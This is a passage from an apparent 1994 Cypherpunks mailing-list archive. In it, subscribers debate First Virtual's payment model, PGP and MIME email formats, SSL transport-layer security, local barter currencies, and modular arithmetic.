terms and conditions have to ensure that you comply with the Visa/MC terms and conditions, that's all. -- Nathaniel From amanda at intercon.com Thu Dec 15 08:24:06 1994 From: amanda at intercon.com (Amanda Walker) Date: Thu, 15 Dec 94 08:24:06 PST Subject: Less Flaming, More Civility Message-ID: <199412151623.LAA23108@intercon.com> > C'punks, when this list started we were a bunch of idealistic privacy > freaks. Look who's on the list now: the developers of cutting edge Internet > software. The two are not necessarily mutually exclusive :). And from this point of view, I have to say that for all of my complaints about the specifics of various things Netscape has put forth, I cannot fault them for trying to improve the status quo. One thing that everyone has in common here is that we all believe that the issues we discuss are important, and that it's worth trying to solve the problems. This is in part, I think, why tempers flare from time to time--I know this was true in my case. Amanda Walker InterCon Systems Corporation From jdwilson at gold.chem.hawaii.edu Thu Dec 15 09:06:29 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Thu, 15 Dec 94 09:06:29 PST Subject: PGP 2.7 Message-ID: <199412151711.MAA03473@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Thu, 15 Dec 1994, DNA wrote: > I keep seeing pgp 2.7 in public key & sig blocks. > > Where do we get it? Viacrypt. It is the commercial version of 2.6.x - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvB4nyoZzwIn1bdtAQFBKgF8Cpy4syrgzPe7Q4vQ7elW/7gvcK+3rfwJ byzKrS8TF7rwL1eLiVZfW+qolOyMB2TG =svxJ -----END PGP SIGNATURE----- From erc at khijol.xmission.com Thu Dec 15 09:08:13 1994 From: erc at khijol.xmission.com (Ed Carp [Sysadmin]) Date: Thu, 15 Dec 94 09:08:13 PST Subject: voice over SLIP? Message-ID: This might be somewhat off-topic, but could someone send me a list of ftp'able software for doing voice over SLIP? I'd prefer linux-based software, but DOS-based would work, too... Thanks very much! -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From eric at remailer.net Thu Dec 15 09:10:50 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 09:10:50 PST Subject: FV fine print In-Reply-To: Message-ID: <199412151808.KAA06618@largo.remailer.net> From: Nathaniel Borenstein FYI, this is a direct carryover from the standard terms & conditions of a Visa/MasterCard merchant account. Now that's what I thought it might be, and I'm not particularly surprised. If you use Visa, you have to play by Visa's rules. On cypherpunks, though, information lifetime is just one of those generally interesting questions. This information storage requirement is reminiscent of the Bank Secrecy Act of (I think) 1974. Is this clause from Visa/MC a direct (or indirect, even) result of that act, or is this just coincidence? This is banking arcanity, not crypto arcanity, and I'm not expecting an answer very hard. Eric From jdwilson at gold.chem.hawaii.edu Thu Dec 15 09:12:45 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Thu, 15 Dec 94 09:12:45 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412151717.MAA03516@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Thu, 15 Dec 1994 nsb at nsb.fv.com wrote: > Moreover, if we supported PGP today, we might indirectly lend > credibility to what we perceive as the incorrect belief that > cryptography is NECESSARY for commerce. Because we see cryptography as > helpful, but not necessary, we aren't going to support PGP right away, > but will probably add such support when a large enough portion of our > customer base wants it and can make use of it. Without cryptography how exactly are you going to protect my credit card numbers from sniffer-snoopers and crackers? Either you will send the credit card text in the clear, or it will be encrypted somehow. Or perhaps you will have customers call you over the phone to give you their credit card info? - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvB6FCoZzwIn1bdtAQE9PAF/W2kx2n8l+Qz9Z/51MVQqjjPgGPdQRK8p WFPmh42CywQKiUjjg2qhqPrmzzz6V91r =6zTt -----END PGP SIGNATURE----- From meconlen at IntNet.net Thu Dec 15 09:41:18 1994 From: meconlen at IntNet.net (Michael Conlen) Date: Thu, 15 Dec 94 09:41:18 PST Subject: MIME (again) Message-ID: <199412151746.MAA03863@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Wed, 14 Dec 1994, L. McCarthy wrote: > I'm using a version of ELM which claims to be MIME-compliant and usually is, > but all I saw in Peter Cassidy's message was a collection of random-looking > extended-ASCII characters. Usually when something arrives in a locally- > unsupported MIME format (like Amanda's GIF a while back), I just get an > "unrecognized format" error message. I didn't see any error messages at all > this time, just a meaningless jumble of characters (different, incidentally, > from the PGP-cipherptext-like characters Tim quoted). Thats what that thing was susposed to be. I got the same things with pine, which I know is susposed to be mime aware. Anyway all this talk about it gave me an idea. A PGP mime extention, where your mail says that you have a PGP encoded message, enter secret pass phrase to contiue. I think this would do a couple of things First get PGP installed on more machines. Sys Admins who install MIME aware applications would almost be required to install PGP beacuse it is a part of MIME. Secone more people would be introduced to PGP. The first time they use a MIME aware application ie. PINE they would be given a message that they do not have a public/private key set up, ect. That time could be used to explain the basics of encryption, public/private key's, and security issuse of using PGP. Third PGP would be more frequently used beacuse it would be right there with there E-Mail, ect. It would not require as much work to set up beacuse the programs could prompt to do things ... Do you want to encrypt this E-Mail with the recipiants public key [Yn] ... Groove on dude Michael Conlen - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvCAzyoZzwIn1bdtAQFCnQGAi19XGrhhoUi7gaAJnG6UUeUjUqvX9yL+ m7qc768s3wEs5sdEqY2mT+JVCT1ES3PB =tQFE -----END PGP SIGNATURE----- From nsb at nsb.fv.com Thu Dec 15 09:45:57 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 09:45:57 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412151751.MAA03958@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Excerpts from fv: 15-Dec-94 Re: FV & PGP (was Re: First.. NetSurfer at gold.chem.hawa (1237*) > Without cryptography how exactly are you going to protect my credit card > numbers from sniffer-snoopers and crackers? Either you will send the > credit card text in the clear, or it will be encrypted somehow. Or perhaps > you will have customers call you over the phone to give you their credit > card info? We NEVER put your credit card number on the Internet. It is entered ONCE via telephone, and after that it is never needed directly -- people sell you things using your FV account-id, which does not have the same security properties as a credit card number. For more information, please send mail to info at fv.com or check out our web pages at http://www.fv.com. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvCB4CoZzwIn1bdtAQHLuAGAzvgG7jYAqpyHC/HD2NCmN3DkxnCeGT6J 3opxp30Uyo0T/5me04hlzvYe4A6IEDbA =yQOr -----END PGP SIGNATURE----- From samman at CS.YALE.EDU Thu Dec 15 09:55:55 1994 From: samman at CS.YALE.EDU (Ben) Date: Thu, 15 Dec 94 09:55:55 PST Subject: FV & PGP (was Re: First Virtual email security) In-Reply-To: <199412151717.MAA03516@bb.hks.net> Message-ID: On Thu, 15 Dec 1994, NetSurfer wrote: > Without cryptography how exactly are you going to protect my credit card > numbers from sniffer-snoopers and crackers? Either you will send the > credit card text in the clear, or it will be encrypted somehow. Or perhaps > you will have customers call you over the phone to give you their credit > card info? Like phone calls are really that secure what with people using cordless and cellular phones that still transmit in the clear even with Congress' best efforts to grant a false sense of security by outlawing some types of scanners. If you have to call, what would be the difference between this and normal mail order save tha the catalog is digital? That's not a significant enough of a change to have it considered a new form of commerce. Ben. ---- "By the end of 1648 all was over. Cromwell was Dictator. The Royalists were crushed; Parliament was a tool; the Constitution was a figment; the Scots rebuffed, the Welsh back in their mountains; the Fleet was reorganised, London overawed. King Charles, at Carisbrooke Castle, where the donkey treads the water wheel, was left to pay the bill. It was mortal." --Winston Churchill --_History_of_English_Speaking_Peoples Vol. II From perry at imsi.com Thu Dec 15 10:03:00 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 10:03:00 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412150210.SAA05624@netcom7.netcom.com> Message-ID: <9412151802.AA01210@snark.imsi.com> Timothy C. May says: > > Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible. This > messages has been formatted as a HyperMIME document. Do not attempt to > read it on a non-HyperMIME-compliant system. You know Tim, I agree with you. This newfangled technology stuff is just too hard to deal with. Multimedia email is an obvious dead end. I'd suggest that we all move back to paper and pencil -- thats a simple common denominator that we all are capable of managing. In fact, we all ought to just gather about in our stone cave around the fire and chat about this in person -- its friendlier that way. Perry Who still remembers telling people who thought that dealing with the NCP to TCP transition was too hard and is suprised to note that there are no more NCP hosts around. Who still remembers the terror in the eyes of floundering mainframe programmers realizing that they might have to learn something other than COBOL if they wanted to keep working for more than minimum wage. From A5713643665 at attpls.net Thu Dec 15 10:49:51 1994 From: A5713643665 at attpls.net (Tom Jones) Date: Thu, 15 Dec 94 10:49:51 PST Subject: Algebra Message-ID: <2B20CAE5> Dear Eric and Cypherpunks, So, how is division defined in Fp? Tom From kaseyu at acad.stedwards.edu Thu Dec 15 11:51:30 1994 From: kaseyu at acad.stedwards.edu ('Kasey Uthurusamy') Date: Thu, 15 Dec 94 11:51:30 PST Subject: 1984 shirt Message-ID: <9412151951.AA19625@toad.com> > > Hi, > > Do you know where I could order 2 XXL shirts? These are the ones that > say '1984 ....we're behind schedule'... > > Thanks! :) > > Kurgan > -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- _O_ "Ah...the KURGAN...he kurgan at gnu.ai.mit.edu \/\ /\/=<---- is the strongest of the punisher at ccwf.cc.utexas.edu * immortals...." kaseyu at acad.stedwards.edu / \ _/ |_ "INVICTUS MANEO" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From tcmay at netcom.com Thu Dec 15 12:13:01 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 12:13:01 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412151802.AA01210@snark.imsi.com> Message-ID: <199412152012.MAA28503@netcom2.netcom.com> Perry E. Metzger wrote: > Timothy C. May says: > > > > Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible. This > > messages has been formatted as a HyperMIME document. Do not attempt to > > read it on a non-HyperMIME-compliant system. > > You know Tim, I agree with you. This newfangled technology stuff is > just too hard to deal with. Multimedia email is an obvious dead > end. I'd suggest that we all move back to paper and pencil -- thats a > simple common denominator that we all are capable of managing. > > In fact, we all ought to just gather about in our stone cave around > the fire and chat about this in person -- its friendlier that way. I see two "stable attractors" for text/graphics/multimedia/etc. sent over the Net: 1. Straight text, ASCII, 80 column format. All systems can handle this, all mailers and newsreaders can handle it, it's what the Usenet is essentially based upon, and it gets the job done. It meets the needs of 95% of us for 95% of our needs. 2. The Web, for graphics, images, etc. This will be the next main stable attractor, deployed on many platforms. (I'm assuming the debate here about Netscape standards does not imply much of a fragmentation, that Mosaic, Netscape, MacWeb, etc., will all basically be able to display Web pages in much the same way.) I'm not arguing against technology, as Perry surely knows. I used FrameMaker 4.02 for my Monte Carlo paper, prettified with nice fonts and printed in 2-column format. I am willing to supply a "FrameViewer" version to this list, if there's enough interest. Other standards I have to deal with are Replica and Acrobat (my Smalltalk vendor likes these), Postscript versions, and the usual assortment of semi-proprietary standards for PhotoShop, Painter, MORE, and so on. The issue is not unwillingness to use new technology, it is, rather, the issue of "stable attractors." That is, what can I/we reasonably expect others to also have. Clearly if I issued my paper to the list in FrameMaker format, or Acrobat format, or even TeX format, only a few people would be able to read it. Fewer still would actually take the steps needed to actually display the paper. Standards, standards, standards! I don't think the minor extensions to e-mail (loosely called "MIME," though MIME serves other functions besides attaching graphics) are worth the effort, frankly. Most of the MIME messages (the ones that tell me about "ISO 558972 fonts" and "Press any key to return") don't seem to warrant the effort....I think in 90%+ of the cases people simply send messages as MIME by default, not becuase non-ASCII stuff is included. If we make the leap, I say make the leap to the Web: cave drawings --> text --> e-mail --> Web (By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.) This is not a rejection of new technology, just a wise selection of which technology to bet on. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From claborne at microcosm.sandiegoca.NCR.COM Thu Dec 15 12:28:27 1994 From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris) Date: Thu, 15 Dec 94 12:28:27 PST Subject: E-Lets Message-ID: <2EF08EA8@microcosm.SanDiegoCA.NCR.COM> The following article has some unique ties to digital cash and what some people would like to see. In summary it is a description of bartering being used in Europe the removes money and replaces it with "Lets". Money no good? May I be the first to coin "E-Lets" :) ================================================================ >From "The European" 23-29 September 1994. Title: "Money no good? Try bartering" ... Additional reporting by Betrice Newbery. The Single Market was launched with the Single European Act of 1987, and with it the vision of a single European currency. But while governments seek a future of trading in ecus, people across the continent are looking to the past - to the days when bartering was the way of the world. Local Exchange Trading Systems (lets) are a form of moneyless trading, with more in common with 19th century anarchism than late 20th-century capitalism. The inhabitants of Stroud, a village in the west of England, can now pay for legal advice from a solicitor in "strouds" as well as sterling. In Madrid, masseurs and furniture removers accept both valle kas and pesetas. In Berlin, talents or deutschmarks are used to pay for babysitting or carpentry. Lets are proving remarkably popular. In Britain, there are more than 200 systems involving as many as 20,000 people. In Spain, the success of the Trueque Lets in Madrid has served as a modle for similar systems to be created in Barcelona, Alicante and the Canary Islands. Switzerland has the Troc de Service in Onex and Demark has a "Ring of Exchange". They could even spread to eastern Europe. A pilot scheme was started this summer in the city of Magdeburg in east Germany. "Because of high unemployment and limited capital, Lets could help people in the east to use their skills and talents," said Hugo Godscalk of Paysys, a German constancy firm which specializes in forms of payment. Although the organization of each Lets is discreetly different they all share a basic tenet: that by tapping local skills and spending power, it is possible to improve the economic and psychological health of the community. They work by creating a local currency, the "bobbin" in Manchester, for example, and encouraging local people and business to accept that currency in pay-ment, or part-payment, of goods and services. Joining a Lets is a quick and painless process. On payment of an initial, one-off registration fee (mainstream money), and a negligible annual administration fee (local money), you are issued with an account in the local currency, a cheque book and a local directory, which lists the goods an services available. You are then free, for example, to start paying for your gardner or bying your groceries in local currency. A small levy is charged on each transaction to cover the administration costs of the system and to pay the salary of the administrator. However, there are no interest charges when you go into debt and no restrictions on credit. While their simplicity makes them accessible, the growing popularity of alternative currencies has less to do with alternatives then the lack of them. Recession, unemployment and the high interest rates have left many people unable to earn, borrow, or spend conventional money. The Trueque (meaning barter) in Madrid was founded in January by Dan Wagman, an American who has been living in Spain for 16 years. "The present system of conventional money is not working too well," he says. "in Spain, 20 per cent of people are unemployed. It is a terrible waste of talent and time. Lets give the unemployed the chance to use their skills and the impoverished immediate access to services that they couldn't otherwise afford." Liz Shepard, who runs the national coordinating organization, Lets Link, in Britain, agrees: "one in six United Kingdom households were experiencing severe debt problems because of high interest rates and recession. An interest-free, non- profit-making system appeals to them." Christine Schoeb and Carlo Jelmini were both students in Geneva when they set up the Troc de Service in Onex as part of their course work. Another ten groups in Bern, Basel, Winterthur and elsewhere operate their own scheme based on talents. One of the founders, Simcha Piwnik, said: "We get professional workers advertising a whole range of services, from electricians to furniture restorers to kitchen-fitters. You can buy furniture, bicycles, organic vegetables - anything. It almost makes traditional street markets redundant." Yet the proliferation of Lets has not been problem-free. According to Michael Jacobs, an economist at Lancaster University and author of "Green Economy", Lets must overcome two main difficulties if they are to survive. "the first is common to all voluntary organisations: will enough people join and remain involved to make them work? The second is peculiar to Lets: is there a tendency for people to leave the local system once they secure employment within the mainstream economy? If so, they may well fail unless there is a continual supply of new members." While survival can be difficult, growth can prove equally problematic. As they have become more wide-spread, Lets have attracted the attention of national treasuries who are con cerned that local currencies could be exploited as a way of avoiding paying tax. Moreover, growth has prompted fears among Lets users that people could accumulate sizable debts and then leave the community without repaying. In August, more than 60 people attended a conference near Montpellier in southern France to discuss ways of introducing Lets to that country. In Dessau, in Germany, a recent conference relulted in the setting up of six new systems. Henk van Arkel, from Utrecht, who runs a series of systems in the Netherlands, was one of the participants, "We are planning with the Irish, Flemish and German and probably the UK systems, for international co-operation across Europe," he said. "We do need more exchange of ideas and improvements. But we are not going to link the currencies. The most important part of the idea is the local aspect." There are, however, sign that Lets are starting to encroach on some of the traditional functions of conventional money. Trading between groups, for example, is just beginning in some areas. But it will be a long time before they rival the ecu. ... __o .. -\<, chris.claborne at sandiegoca.attgis.com ...(*)/(*). CI$: 76340.2422 PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. PGP-encrypted e-mail welcome! From jrochkin at cs.oberlin.edu Thu Dec 15 12:36:14 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 15 Dec 94 12:36:14 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: At 3:12 PM 12/15/94, Timothy C. May wrote: >If we make the leap, I say make the leap to the Web: > >cave drawings --> text --> e-mail --> Web > >(By Web I of course mean the whole ball of wax involving HTML/HTTP/etc.) > >This is not a rejection of new technology, just a wise selection of >which technology to bet on. HTTP and email, serve different transport purposes. I don't think I really need to explain in what ways they are different, because we all know. Suffice it to say that mailing lists work better as a mailing list then it ever could as a web page, even with forms and all that stuff. A mailing list is a different transport-method choice then HTTP is. But there's no reason why you couldn't mail html documents. html isn't a "transport" choice, but a "content" choice. Maybe in the future all of our mail readers will be able to render html, and people will send html mail, with anchors and ordered lists and whatever else. That's something I think is likely to happen, eventually. Email and HTTP are transport mechanisms, whereas html and ascii text (which of course is a subset of html) are content formats. And MIME is a mechanism for describing what types of content formats are contained in the message, whether the message is a usenet article, a piece of email, or a web page. A given "transmission" of course can't be both email and HTTP, but it could be email and use MIME and be html. Or be http and mime and html. I don't think we'll ever stop using email in favor of the web and HTTP, because they serve different purposes. I don't think Tim really does thinks we'll stop using email either, since I've heard him deprecate the web several times. He is just trying to convince us not to use MIME (or html for that matter) in email we send to the list, and thinks maybe this argument will convince us and not result in us calling him a technophobe. :) From tcmay at netcom.com Thu Dec 15 12:37:30 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 12:37:30 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com> Message-ID: <199412152036.MAA01944@netcom2.netcom.com> I want to add something to what I just sent out, something of direct relevance for PGP efforts: > I see two "stable attractors" for text/graphics/multimedia/etc. sent > over the Net: > > 1. Straight text, ASCII, 80 column format. All systems can handle > this, all mailers and newsreaders can handle it, it's what the Usenet > is essentially based upon, and it gets the job done. It meets the > needs of 95% of us for 95% of our needs. > > 2. The Web, for graphics, images, etc. This will be the next main > stable attractor, deployed on many platforms. (I'm assuming the debate > here about Netscape standards does not imply much of a fragmentation, > that Mosaic, Netscape, MacWeb, etc., will all basically be able to > display Web pages in much the same way.) And these two attractors are where the efforts on encryption have the biggest pay-offs. We already know that PGP is "text"-oriented, and that PGP messages can be read on a variety of machines, from terminal to DOS to Macs to Suns, etc. PGP is well-suited to a straight text world, as it makes no assumptions about non-ASCII capabilitites. (Using the ASCII-armor mode that most of us use.) It is when assumptions are made by programs, think of "Lotus Notes" or "DECMail," that interoperability is lost. The Lesson: Beware of making any assumptions about MIME sorts of extensions to use with PGP, as many people will--for whatever reasons--not be able or willing to process MIME mail. The Web is where I think a lot of future efforts on integrating PGP in should happen. (I'm speaking of when the Web is used to send e-mail, which I hear is being worked on by many groups; clearly a lot of Netscape/Mosaic/etc. users expect to use these products as their main interface to the Net, and not have to have separate mail programs.) This is where I would put my money. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From nsb at nsb.fv.com Thu Dec 15 12:38:30 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 12:38:30 PST Subject: properties of FV In-Reply-To: <23696.787506983.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 Re: properties of FV Eric Hughes at remailer.net (3987) > I'm not trying to imply that you couldn't cobble something up fairly > quickly, but I have my doubts that a good quick hack will scale > appropriately for even a modest sized operation. Assuming that thing that you're "cobbling together" is based on a reasonably robust database engine, it should scale a long, long way. Basically all you need is a set of three-part records: account-id, cumulative amount, and timestamp of oldest transaction. (You might want a fourth field that gives all the purchasing details as text, if your services sells a range of different kinds of things). Any good commercial db system should be able to handle a LOT of such records. > > The very nature > > of such a net billing system requires linkability of transaction to > > transaction, or in other words generates identity. So FV is > > unsuitable for small value anonymous transactions. > I would still like to you address this issue, if only to acknowledge > the above characterization. This goes back to the two kinds of anonymity that you so usefully defined in your earlier message. These small transactions would have counterparty anonymity -- all that the seller knows is your first virtual id, which is essentially a user-chosen pseudonym -- but not issuer anonymity. > As I had recalled from reading your materials, you were charging 29 > cents plus 2% on one leg of the transaction plus an additional 2% on > the other. Rereading, this is not the case. Am I remembering a > previous situation? No, you're just confused. Our charges have not changed, this is what they've always been. Probably our materials weren't clear enough somewhere, in which case I apologize. > Partial security is better than no security. That's a *very* interesting statement. I'm not at all sure what it means, so I'm not sure if I believe it or not. Sometimes partial security is worse than no security because it gives people a false *sense* of security. (People who know their email is going in the clear are likely to be more prudent than people who believe their email is "encrypted" even though the encryption algorithm might be a very poor one. I've even known people to pass real secrets around using rot13, amazingly enough. People can be quite naive.) > One of the underlying conceptual problems with allowing a key to be at > risk is some sort of belief that compromises of secret keys should > never ever EVER be allowed to happen. This is ludicrous. When the > benefit of the use of a private key means that it might be > compromised, don't rely upon it's not being compromised. This is a very good point. It is one that is often missed in analyses of digital banks, in particular, where the consequences of compromising the bank's keys are often not sufficiently considered. > In particular, if a digital signature does not, by agreement, carry an > implied warrantee of identity, then there's no problem at all. Use > the crypto entirely for transit security. If someone hacks your > machine and grabs your passphrase and forges a transaction, at least > the intruder has to grab your passphrase. This is exactly the way we would expect to use crypto layered on top of First Virtual's protocols, if and when such cryptographic protocols are deployed widely enough to have penetrated af meaningful portion of our market. -- Nathaniel From rishab at dxm.ernet.in Thu Dec 15 12:38:59 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Thu, 15 Dec 94 12:38:59 PST Subject: On criticizing SSL, and insecure transport layers Message-ID: kipp at mcom.com: > Is [SSL] insecure? If so, how? > > Is there some cipher techonology that it absolutely must support? If > so, which one? why? While I'm not going to say anything about SSL's qualities as a secure transport layer as such (I've not looked at it carefully enough) I think that the criticisms are on larger issues. 1. Standards - the reinventing the wheel criticism; if other methods for more or less the same thing exist (and swIPe source has been around for all to test to their hearts' content) why try a new one? This point seems to have mutated into general criticism of NCom's attitude to / knowledge of IETF proceedings and the technology 2. Security - the basic insecurity of _any_ transport layer. "If Netscape had to come up with a new secure protocol, why did they choose the transport layer?" The transport layer is insecure because: it is less under the control of a user, it happens 'automagically'; it is at a lower level and so generally implemented by central authorities - sysadmins etc, and does not suit the web of trust model (nor does X.509) which is much better outside dictatorships; it is provided by the telco or net service provider who, as I suggested earlier, are prone to arm-twisting by the authorities, whether by legislation, or while 'cooperating'. Transport layer security does not provide data authentication, it only provides server authentication; nor does it provide data security and privacy between users, it only provides network security. To rebut Kipp's favourite justification, insecure transmission of passwords: transport layer security does _not_ improve password security/privacy, but only ensures that once a plaintext password is received by the transport layer, usually at a service provider, then it will not be intercepted. Secure transmission of passwords could (but as far as I know is not widely) be implemented at the client level, through DH handshaking or something, which would ensure a completely secure and _private_ transaction. Transport layer security is nice because it is conveniently automatic and transparent, but it can lead to a false sense of security for precisely that reason. Of course these are quintessentially Cypherpunk objections. A bank, or Singapore, would be quite comfortable with such a system for internal networks. "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From perry at imsi.com Thu Dec 15 12:39:21 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 12:39:21 PST Subject: Algebra In-Reply-To: <2B20CAE5> Message-ID: <9412152037.AA01349@snark.imsi.com> Tom Jones says: > Dear Eric and Cypherpunks, > > So, how is division defined in Fp? Being an old fogey, I still refer to the field formed by the integers modulo a prime by a gothic capital Z sub p. In Z_p, you define division as the inverse of multiplcation, just as in real life. One easy way to do this is to note that every number in a field like this has a multiplicative inverse. Multiplying by the multiplicative inverse of a number is the same as dividing by the number. For the hell of it, make yourself a multiplication table for Z_5. Its a quick exercise. Note that every number in Z_5 other than zero possesses a multiplicative inverse -- that is, a number that it can be multiplied against to yield 1. Step back and then observe, experimentally, that for any three positive numbers in Z_5 A, B and C such that A*B=C, that C*(B^-1)=A. One can, of course, prove that this is the case rigorously... Perry From snyderra at dunx1.ocs.drexel.edu Thu Dec 15 12:45:30 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Thu, 15 Dec 94 12:45:30 PST Subject: MIME (again) In-Reply-To: <199412151746.MAA03863@bb.hks.net> Message-ID: <199412152043.PAA26851@dunx1.ocs.drexel.edu> -----BEGIN PGP SIGNED MESSAGE----- Michael Conlen scribbles: > Thats what that thing was susposed to be. I got the same things with > pine, which I know is susposed to be mime aware. Anyway all this talk > about it gave me an idea. A PGP mime extention, where your mail says that > you have a PGP encoded message, enter secret pass phrase to contiue. I > think this would do a couple of things This is out in draft form. > First get PGP installed on more machines. Sys Admins who install > MIME aware applications would almost be required to install PGP > beacuse it is a part of MIME. Just like they are almost required to install MS Word because of the existance of application/ms-word? Speaking as a SysAdmin, if it were a limited use item, where only a few people wanted it, I would show the users how to set up their own MIME handling, like metamail's .mailcap file. > Secone more people would be introduced to PGP. The first time they > use a MIME aware application ie. PINE they would be given a > message that they do not have a public/private key set up, ect. > That time could be used to explain the basics of encryption, > public/private key's, and security issuse of using PGP. Only if the user chose to send things in application/pgp (or is it text/pgp?) If they chose to send text/plain, they'd never have to deal with PGP. Forcing PGP down people's throats is not a way of winning "converts." You need to convince them of the need, they present well-integrated tools that make it simple. If you try to force people to use PGP, they'll find work-arounds and do what they can to avoid it. Bob -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvCae+S0CjsjWS0VAQHYrgP/ZtHYxq1iVJmDMlMj3GIwfKfTGm+Dka63 8i1z1b5tRaML26Ny+P47ssGINAwA3/d5TsOH8VUh5ZhVVYZ7+paveS1rNBcKf8ek JtnpSVrJ2QCW5QEamEs8wUUQJeHB1qGw85GLR56b1+YOQlI5qQ/DYDlI8Ip6xH3h T+Pqo3zBGiA= =x+8K -----END PGP SIGNATURE----- From perry at imsi.com Thu Dec 15 13:11:44 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 13:11:44 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com> Message-ID: <9412152110.AA01391@snark.imsi.com> Timothy C. May says: > I see two "stable attractors" for text/graphics/multimedia/etc. sent > over the Net: > > 1. Straight text, ASCII, 80 column format. All systems can handle > this, all mailers and newsreaders can handle it, it's what the Usenet > is essentially based upon, and it gets the job done. Sorry, Tim, but this isn't true. I know people who still own VIC-20s that can't handle 80 columns. Also, users of ASR-33 teletypes might be left out by the requirement to handle full ASCII. I was using an ASR-33 full time only 15 years ago. Now, I know that all usenet postings in Japan these days use ISO-2022 encoded characters, and MIME and all that, and that people in Russia use similar methods to carry their stuff, but they are just bounders. I say its back to 38 columns and upper-case only Baudot in order to meet the lowest common denominator. > 2. The Web, for 